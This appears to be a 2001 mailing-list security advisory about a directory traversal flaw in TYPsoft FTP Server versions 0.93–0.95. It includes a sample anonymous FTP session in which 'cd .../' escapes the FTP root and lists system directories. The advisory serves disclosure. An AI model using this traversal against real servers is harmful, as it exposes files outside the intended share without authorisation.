~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerabilty in TYPsoft FTP server v0.95 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: TYPsoft FTP Server is a freeware ftp server available from http://typsoft.n3.net . Affected systems: FTP server v0.95 - 0.93 and probably prior versions for Windows 95/98/NT/2000/ME Description: An attacker with anonymous access to the ftp server can break out of the ftp root using the dot vulnerability. This is the problem: >ftp 127.0.0.1 220 TYPsoft FTP server 0.95 ready... User (127.0.0.1:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp>pwd 257 " / " is current directory. ftp>cd ../ 501 CWD failed. Cannot accept relative path using dot notation. ftp> cd .../ 250 CWD command successful. "/.../" is current directory. ftp>dir drw-rw-rw- 1 ftp ftp 0 May 01 19:44 FTP Server drw-rw-rw- 1 ftp ftp 0 May 01 19:47 temp drw-rw-rw- 1 ftp ftp 0 Dec 24 2000 windows ..... 226 Transfer complete. ftp> Vendor status: TYPsoft staff was contacted on Tuesday 1 May,2001 and no reply was received. SosPiro sospiroat_private
This archive was generated by hypermail 2b30 : Fri May 11 2001 - 09:17:27 PDT